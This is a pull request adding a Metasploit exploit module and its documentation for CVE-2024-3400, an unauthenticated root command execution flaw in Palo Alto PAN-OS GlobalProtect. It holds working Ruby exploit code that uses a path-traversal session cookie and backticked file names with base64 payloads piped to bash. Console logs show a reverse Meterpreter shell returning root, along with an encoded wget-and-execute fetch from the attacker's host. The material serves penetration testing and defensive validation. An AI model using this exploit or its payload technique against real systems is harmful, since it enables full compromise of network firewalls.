### PR TITLE
Exploit module for CVE-2024-3400 - Palo Alto Networks PAN-OS

### DIFF
--- a/documentation/modules/exploit/linux/http/panos_telemetry_cmd_exec.md
+++ b/documentation/modules/exploit/linux/http/panos_telemetry_cmd_exec.md
@@ -1,0 +1,110 @@
+## Vulnerable Application
+This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that
+allow an unauthenticated attacker to create arbitrarily named files and execute
+shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or
+GlobalProtect Portal enabled and telemetry collection on (default). Affected versions
+include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,
+< 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to
+one hour to execute, depending on how often the telemetry service is set to run.
+
+For a technical analysis of the vulnerability, read our [Rapid7 Analysis](https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis).
+
+## Testing
+Boot a vulnerable PAN-OS VM or device, then authenticate to the management web service with default credentials. From the
+web dashboard, configure a GlobalProtect [Portal](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-portals/set-up-access-to-the-globalprotect-portal)
+and/or [Gateway](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-gateways/configure-a-globalprotect-gateway).
+With either or both started, the `gpsvc` service will begin serving an HTTPS service on port 443 for the second
+network interface. Confirm that the web service presents a Palo Alto Networks login page when viewed. This web application
+is the target of the exploit, and the '/global-protect/login.esp' page should be accessible.
+
+The exploit has been tested against PAN-OS 10.2.9, and it should also be effective against other vulnerable 10.2, 11.0,
+and 11.1 versions.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/http/panos_telemetry_cmd_exec`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set payload cmd/linux/http/x64/meterpreter_reverse_tcp`
+5. `set LHOST eth0`
+6. `check`
+7. `exploit`
+
+## Scenarios
+
+### Linux Command
+
+Note: Ensure the target is vulnerable to unauthenticated file creation with the `check` command.
+
+Note: Since it can take up to one hour to establish code execution, the listener should be left running for that period.
+
+```
+msf6 > use exploit/linux/http/panos_telemetry_cmd_exec
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > show options
+
+Module options (exploit/linux/http/panos_telemetry_cmd_exec):
+
+   Name       Current Setting            Required  Description
+   ----       ---------------            --------  -----------
+   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      443                        yes       The target port (TCP)
+   SSL        true                       no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /global-protect/login.esp  yes       An existing web application endpoint
+   VHOST                                 no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      EkcxbboZMyD      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set RHOSTS 192.168.50.226
+RHOSTS => 192.168.50.226
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LHOST 192.168.50.25
+LHOST => 192.168.50.25
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LPORT 8585
+LPORT => 8585
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > check
+[+] 192.168.50.226:443 - The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ipteqmbl-regular.woff2 NOTE: This file will not be deleted
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.50.25:8585 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ikxrpbmq-regular.woff2 NOTE: This file will not be deleted
+[*] Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload
+[*] Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled
+[*] Meterpreter session 1 opened (192.168.50.25:8585 -> 192.168.50.216:48310) at 2024-04-18 14:53:09 -0500
+[!] This exploit may require manual cleanup of '/opt/panlogs/tmp/device_telemetry/minute/lyne`echo${IFS}-n${IFS}d2dldCAtcU8gL3Zhci90bXAvdWdWZlhXUnhWIGh0dHA6Ly8xOTIuMTY4LjUwLjI1OjgwODAvcUpPXzJ2MUFPVkRIc2hsVVIyRHVzQTsgY2htb2QgK3ggL3Zhci90bXAvdWdWZlhXUnhWOyAvdmFyL3RtcC91Z1ZmWFdSeFYgJg==|base64${IFS}-d|bash${IFS}-`' on the target
+
+meterpreter > getuid 
+Server username: root
+meterpreter > sysinfo 
+Computer     : 192.168.50.216
+OS           : CentOS 8.3.2011 (Linux 4.18.0-240.1.1.20.pan.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```

--- a/documentation/modules/exploit/linux/http/panos_telemetry_cmd_exec.md
+++ b/documentation/modules/exploit/linux/http/panos_telemetry_cmd_exec.md
@@ -38,6 +38,8 @@ Note: Ensure the target is vulnerable to unauthenticated file creation with the 
 
 Note: Since it can take up to one hour to establish code execution, the listener should be left running for that period.
 
+Note: In the standard PAN-OS configuration, the payload is delivered to the GlobalProtect interface IP, but the shell will return via a different PAN-OS management interface IP. 
+
 ```
 msf6 > use exploit/linux/http/panos_telemetry_cmd_exec
 [*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp

--- a/documentation/modules/exploit/linux/http/panos_telemetry_cmd_exec.md
+++ b/documentation/modules/exploit/linux/http/panos_telemetry_cmd_exec.md
@@ -17,7 +17,7 @@ With either or both started, the `gpsvc` service will begin serving an HTTPS ser
 network interface. Confirm that the web service presents a Palo Alto Networks login page when viewed. This web application
 is the target of the exploit, and the '/global-protect/login.esp' page should be accessible.
 
-The exploit has been tested against PAN-OS 10.2.9, and it should also be effective against other vulnerable 10.2, 11.0,
+The exploit has been tested against PAN-OS 10.2.9, and it should also be effective against other similarly-configured 10.2, 11.0,
 and 11.1 versions.
 
 ## Verification Steps

--- a/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
+++ b/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'An existing application web endpoint', '/global-protect/login.esp']),
+        OptString.new('TARGETURI', [true, 'An existing web application endpoint', '/global-protect/login.esp']),
       ]
     )
   end

--- a/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
+++ b/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
           include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,
           < 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1.
         },
-        'License' => MsSF_LICENSE,
+        'License' => MSF_LICENSE,
         'Author' => [
           'remmons-r7', # Metasploit module
           'sfewer-r7' # Metasploit module

--- a/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
+++ b/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     # Try to create a new empty file in an accessible directory with the exploit primitive
     file_check_name = "glyphicons-#{Rex::Text.rand_text_alpha_lower(8)}-regular.woff2"
-    res_create_file = touch_file("/var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name}")
+    touch_file("/var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name}")
 
     # Access that file and a file that doesn't exist to confirm they return 403 and 404, respectively
     res_check_created = send_request_cgi(
@@ -87,17 +87,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res_check_not_created = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri("/global-protect/portal/fonts/X#{file_check_name}"),
+      'uri' => normalize_uri("/global-protect/portal/fonts/X#{file_check_name}")
     )
 
-    if !(res_check_created&.code == 403) and !(res_check_not_created&.code == 404)
-      fail_with(Failure::UnexpectedReply, "Arbitrary file write did not succeed!")
+    if (res_check_created&.code != 403) || (res_check_not_created&.code != 404)
+      fail_with(Failure::UnexpectedReply, 'Arbitrary file write did not succeed!')
     end
 
     remote_prot_scheme = datastore['SSL'] == true ? 'https://' : 'http://'
     remote_host = datastore['VHOST'] || datastore['RHOST']
     print_status("Arbitrary file write succeeded: #{remote_prot_scheme}#{remote_host}:#{datastore['RPORT']}/global-protect/portal/fonts/#{file_check_name}")
-    print_status("Note: This file will not be deleted by the module.")
+    print_status('Note: This file will not be deleted by the module.')
 
     CheckCode::Appears
   end
@@ -121,13 +121,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'Cookie' => "SESSID=./../../../..#{file}"
       }
     )
-
     print_status("Touched file: #{file}")
-    return res
   end
 
   def exploit
     execute_command(payload.encoded)
-    print_status("Starting staged payload server. Depending on the version, it may take the telemetry service up to one hour to execute the payload.")
+    print_status('Starting staged payload server. Depending on the version, it may take the telemetry service up to one hour to execute the payload.')
   end
 end

--- a/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
+++ b/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
@@ -1,0 +1,133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits a vulnerability in Palo Alto Networks PAN-OS that
+          allows an unauthenticated attacker to create arbitrarily named files and execute
+          shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or
+          GlobalProtect Portal enabled and telemetry collection on (default). Affected versions
+          include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,
+          < 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1.
+        },
+        'License' => MsSF_LICENSE,
+        'Author' => [
+          'remmons-r7', # Metasploit module
+          'sfewer-r7' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2024-3400'],
+          ['URL', 'https://security.paloaltonetworks.com/CVE-2024-3400'], # Vendor Advisory
+          ['URL', 'https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/'] # Initial Volexity report of the 0day exploitation
+        ],
+        'DisclosureDate' => '2024-04-12',
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X64],
+        'Privileged' => true, # Executes as root on Linux
+        'Targets' => [ [ 'Default', {} ] ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
+          'FETCH_COMMAND' => 'WGET',
+          'RPORT' => 443,
+          'SSL' => true,
+          'FETCH_WRITABLE_DIR' => '/var/tmp',
+          'WfsDelay' => 36000, # 1h, since telemetry service cronjob can take up to an hour
+          'StagerRetryWait' => 3600 # 1h,since telemetry service cronjob can take up to an hour
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            IOC_IN_LOGS,
+            # The /var/log/pan/gpsvc.log file will log an unmarshal failure message for every malformed session created.
+            # The NGINX frontend web server, which proxies requests to the GlobalProtect service, will log client IPs in /var/log/nginx/sslvpn_access.log.
+            # Similarly, the log file /var/log/pan/sslvpn-access/sslvpn-access.log will also contain a log of the HTTP requests.
+            # The "device_telemetry_*.log" files in /var/log/pan will log the command being injected.
+            ARTIFACTS_ON_DISK
+            # Several 0 length files are created in the following directories during exploitation:
+            # - /opt/panlogs/tmp/device_telemetry/day/
+            # - /opt/panlogs/tmp/device_telemetry/hour/
+            # - /opt/panlogs/tmp/device_telemetry/minute/
+            # - /var/appweb/sslvpndocs/global-protect/portal/fonts/
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'An existing application web endpoint', '/global-protect/login.esp']),
+      ]
+    )
+  end
+
+  def check
+    # Try to create a new empty file in an accessible directory with the exploit primitive
+    file_check_name = "glyphicons-#{Rex::Text.rand_text_alpha_lower(8)}-regular.woff2"
+    res_create_file = touch_file("/var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name}")
+
+    # Access that file and a file that doesn't exist to confirm they return 403 and 404, respectively
+    res_check_created = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri("/global-protect/portal/fonts/#{file_check_name}")
+    )
+
+    res_check_not_created = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri("/global-protect/portal/fonts/X#{file_check_name}"),
+    )
+
+    if !(res_check_created&.code == 403) and !(res_check_not_created&.code == 404)
+      fail_with(Failure::UnexpectedReply, "Arbitrary file write did not succeed!")
+    end
+
+    remote_prot_scheme = datastore['SSL'] == true ? 'https://' : 'http://'
+    remote_host = datastore['VHOST'] || datastore['RHOST']
+    print_status("Arbitrary file write succeeded: #{remote_prot_scheme}#{remote_host}:#{datastore['RPORT']}/global-protect/portal/fonts/#{file_check_name}")
+    print_status("Note: This file will not be deleted by the module.")
+
+    CheckCode::Appears
+  end
+
+  def execute_command(cmd)
+    # Encode the shell command payload as base64, then embed it in the appropriate exploitation context
+    cmd = "echo${IFS}-n${IFS}#{Rex::Text.encode_base64(cmd)}|base64${IFS}-d|bash${IFS}-"
+
+    # Create maliciously named files in all three possible telemetry directories
+    touch_file("/opt/panlogs/tmp/device_telemetry/hour/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`")
+    touch_file("/opt/panlogs/tmp/device_telemetry/day/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`")
+    touch_file("/opt/panlogs/tmp/device_telemetry/minute/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`")
+  end
+
+  def touch_file(file)
+    # Exploit primitive similar to `touch`, creating an empty file owned by root in the specified location
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'headers' => {
+        'Cookie' => "SESSID=./../../../..#{file}"
+      }
+    )
+
+    print_status("Touched file: #{file}")
+    return res
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+    print_status("Starting staged payload server. Depending on the version, it may take the telemetry service up to one hour to execute the payload.")
+  end
+end

--- a/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
+++ b/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => true, # Executes as root on Linux
         'Targets' => [ [ 'Default', {} ] ],
         'DefaultOptions' => {
-          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
           'FETCH_COMMAND' => 'WGET',
           'RPORT' => 443,
           'SSL' => true,

--- a/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
+++ b/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
@@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def touch_file(file)
     # Exploit primitive similar to `touch`, creating an empty file owned by root in the specified location
-    res = send_request_cgi(
+    send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path),
       'headers' => {

--- a/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
+++ b/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
@@ -129,12 +129,12 @@ class MetasploitModule < Msf::Exploit::Remote
       "/opt/panlogs/tmp/device_telemetry/minute/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`"
     ]
 
-    files.each do | file_path |
-        vprint_status("Creating file at #{file_path}")
-        touch_file(file_path)
+    files.each do |file_path|
+      vprint_status("Creating file at #{file_path}")
+      touch_file(file_path)
 
-        # Must register for clean up here instead of within touch_file, since touch_file is used in the check
-        register_file_for_cleanup(file_path)
+      # Must register for clean up here instead of within touch_file, since touch_file is used in the check
+      register_file_for_cleanup(file_path)
     end
 
     print_status('Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload')

--- a/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
+++ b/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -15,12 +16,13 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution',
         'Description' => %q{
-          This module exploits a vulnerability in Palo Alto Networks PAN-OS that
-          allows an unauthenticated attacker to create arbitrarily named files and execute
+          This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that
+          allow an unauthenticated attacker to create arbitrarily named files and execute
           shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or
           GlobalProtect Portal enabled and telemetry collection on (default). Affected versions
           include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,
-          < 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1.
+          < 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to
+          one hour to execute, depending on how often the telemetry service is set to run.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -28,13 +30,14 @@ class MetasploitModule < Msf::Exploit::Remote
           'sfewer-r7' # Metasploit module
         ],
         'References' => [
-          ['CVE', '2024-3400'],
+          ['CVE', '2024-3400'], # At the time of announcement, both vulnerabilities were assigned one CVE identifier
           ['URL', 'https://security.paloaltonetworks.com/CVE-2024-3400'], # Vendor Advisory
-          ['URL', 'https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/'] # Initial Volexity report of the 0day exploitation
+          ['URL', 'https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/'], # Initial Volexity report of the 0day exploitation
+          ['URL', 'https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis'] # Rapid7 Analysis
         ],
         'DisclosureDate' => '2024-04-12',
-        'Platform' => 'linux',
-        'Arch' => [ARCH_X64],
+        'Platform' => [ 'linux', 'unix' ],
+        'Arch' => [ARCH_CMD],
         'Privileged' => true, # Executes as root on Linux
         'Targets' => [ [ 'Default', {} ] ],
         'DefaultOptions' => {
@@ -43,8 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'RPORT' => 443,
           'SSL' => true,
           'FETCH_WRITABLE_DIR' => '/var/tmp',
-          'WfsDelay' => 36000, # 1h, since telemetry service cronjob can take up to an hour
-          'StagerRetryWait' => 3600 # 1h,since telemetry service cronjob can take up to an hour
+          'WfsDelay' => 3600 # 1h, since telemetry service cronjob can take up to an hour
         },
         'DefaultTarget' => 0,
         'Notes' => {
@@ -52,13 +54,12 @@ class MetasploitModule < Msf::Exploit::Remote
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [
             IOC_IN_LOGS,
-            # The /var/log/pan/gpsvc.log file will log an unmarshal failure message for every malformed session created.
-            # The NGINX frontend web server, which proxies requests to the GlobalProtect service, will log client IPs in /var/log/nginx/sslvpn_access.log.
-            # Similarly, the log file /var/log/pan/sslvpn-access/sslvpn-access.log will also contain a log of the HTTP requests.
-            # The "device_telemetry_*.log" files in /var/log/pan will log the command being injected.
+            # The /var/log/pan/gpsvc.log file will log an unmarshal failure message for every malformed session created
+            # The NGINX frontend web server, which proxies requests to the GlobalProtect service, will log client IPs in /var/log/nginx/sslvpn_access.log
+            # Similarly, the log file /var/log/pan/sslvpn-access/sslvpn-access.log will also contain a log of the HTTP requests
+            # The "device_telemetry_*.log" files in /var/log/pan will log the command being injected
             ARTIFACTS_ON_DISK
-            # Several 0 length files are created in the following directories during exploitation:
-            # - /opt/panlogs/tmp/device_telemetry/day/
+            # Several 0 length files are created in the following directories during checks and exploitation:
             # - /opt/panlogs/tmp/device_telemetry/hour/
             # - /opt/panlogs/tmp/device_telemetry/minute/
             # - /var/appweb/sslvpndocs/global-protect/portal/fonts/
@@ -76,44 +77,36 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     # Try to create a new empty file in an accessible directory with the exploit primitive
+    # This file name was chosen because an extension in (css|js|eot|woff|woff2|ttf) is required for correct NGINX routing, and similarly named files already exist in the 'fonts' directory
     file_check_name = "glyphicons-#{Rex::Text.rand_text_alpha_lower(8)}-regular.woff2"
     touch_file("/var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name}")
 
     # Access that file and a file that doesn't exist to confirm they return 403 and 404, respectively
     res_check_created = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri("/global-protect/portal/fonts/#{file_check_name}")
+      'uri' => normalize_uri('global-protect', 'portal', 'fonts', file_check_name)
     )
+
+    return CheckCode::Unknown('Connection failed') unless res_check_created
 
     res_check_not_created = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri("/global-protect/portal/fonts/X#{file_check_name}")
+      'uri' => normalize_uri('global-protect', 'portal', 'fonts', "X#{file_check_name}")
     )
 
-    if (res_check_created&.code != 403) || (res_check_not_created&.code != 404)
-      fail_with(Failure::UnexpectedReply, 'Arbitrary file write did not succeed!')
+    return CheckCode::Unknown('Connection failed') unless res_check_not_created
+
+    if (res_check_created.code != 403) || (res_check_not_created.code != 404)
+      return CheckCode::Safe('Arbitrary file write did not succeed')
     end
 
-    remote_prot_scheme = datastore['SSL'] == true ? 'https://' : 'http://'
-    remote_host = datastore['VHOST'] || datastore['RHOST']
-    print_status("Arbitrary file write succeeded: #{remote_prot_scheme}#{remote_host}:#{datastore['RPORT']}/global-protect/portal/fonts/#{file_check_name}")
-    print_status('Note: This file will not be deleted by the module.')
-
-    CheckCode::Appears
-  end
-
-  def execute_command(cmd)
-    # Encode the shell command payload as base64, then embed it in the appropriate exploitation context
-    cmd = "echo${IFS}-n${IFS}#{Rex::Text.encode_base64(cmd)}|base64${IFS}-d|bash${IFS}-"
-
-    # Create maliciously named files in all three possible telemetry directories
-    touch_file("/opt/panlogs/tmp/device_telemetry/hour/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`")
-    touch_file("/opt/panlogs/tmp/device_telemetry/day/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`")
-    touch_file("/opt/panlogs/tmp/device_telemetry/minute/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`")
+    CheckCode::Vulnerable("Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name} NOTE: This file will not be deleted")
   end
 
   def touch_file(file)
     # Exploit primitive similar to `touch`, creating an empty file owned by root in the specified location
+    fail_with(Failure::BadConfig, 'Semicolon cannot be present in file name, due to the cookie injection context') if file.include? ';'
+
     send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path),
@@ -121,11 +114,30 @@ class MetasploitModule < Msf::Exploit::Remote
         'Cookie' => "SESSID=./../../../..#{file}"
       }
     )
-    print_status("Touched file: #{file}")
   end
 
   def exploit
-    execute_command(payload.encoded)
-    print_status('Starting staged payload server. Depending on the version, it may take the telemetry service up to one hour to execute the payload.')
+    # Encode the shell command payload as base64, then embed it in the appropriate exploitation context
+    # Since payloads cannot contain spaces, ${IFS} is used as a separator
+    cmd = "echo${IFS}-n${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|bash${IFS}-"
+
+    # Create maliciously named files in both telemetry directories that might be used by affected versions
+    # Both files are necessary, since it seems that some PAN-OS versions only execute payloads in 'hour' and others use 'minute'.
+    # It's possible that the payload will execute twice, but we've only observed one location working during testing
+    files = [
+      "/opt/panlogs/tmp/device_telemetry/hour/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`",
+      "/opt/panlogs/tmp/device_telemetry/minute/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`"
+    ]
+
+    files.each do | file_path |
+        vprint_status("Creating file at #{file_path}")
+        touch_file(file_path)
+
+        # Must register for clean up here instead of within touch_file, since touch_file is used in the check
+        register_file_for_cleanup(file_path)
+    end
+
+    print_status('Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload')
+    print_status('Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled')
   end
 end


### PR DESCRIPTION
This pull request is an exploit module for https://security.paloaltonetworks.com/CVE-2024-3400, affecting PAN-OS GlobalProtect Gateway and GlobalProtect Portal deployments with the default telemetry service enabled.

## Example usage:

```
msf6 > use exploit/linux/http/panos_telemetry_cmd_exec
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > show options

Module options (exploit/linux/http/panos_telemetry_cmd_exec):

   Name       Current Setting            Required  Description
   ----       ---------------            --------  -----------
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443                        yes       The target port (TCP)
   SSL        true                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /global-protect/login.esp  yes       An existing web application endpoint
   VHOST                                 no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ugVfXWRxV        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Default



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set RHOSTS 192.168.50.226
RHOSTS => 192.168.50.226
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LHOST 192.168.50.25
LHOST => 192.168.50.25
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LPORT 8585
LPORT => 8585
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > check
[+] 192.168.50.226:443 - The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ipteqmbl-regular.woff2 NOTE: This file will not be deleted
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > exploit

[*] Started reverse TCP handler on 192.168.50.25:8585 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ikxrpbmq-regular.woff2 NOTE: This file will not be deleted
[*] Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload
[*] Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled
[*] Meterpreter session 1 opened (192.168.50.25:8585 -> 192.168.50.216:48310) at 2024-04-18 14:53:09 -0500
[!] This exploit may require manual cleanup of '/opt/panlogs/tmp/device_telemetry/minute/lyne`echo${IFS}-n${IFS}d2dldCAtcU8gL3Zhci90bXAvdWdWZlhXUnhWIGh0dHA6Ly8xOTIuMTY4LjUwLjI1OjgwODAvcUpPXzJ2MUFPVkRIc2hsVVIyRHVzQTsgY2htb2QgK3ggL3Zhci90bXAvdWdWZlhXUnhWOyAvdmFyL3RtcC91Z1ZmWFdSeFYgJg==|base64${IFS}-d|bash${IFS}-`' on the target

meterpreter > getuid 
Server username: root
meterpreter > sysinfo 
Computer     : 192.168.50.216
OS           : CentOS 8.3.2011 (Linux 4.18.0-240.1.1.20.pan.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

Thank you!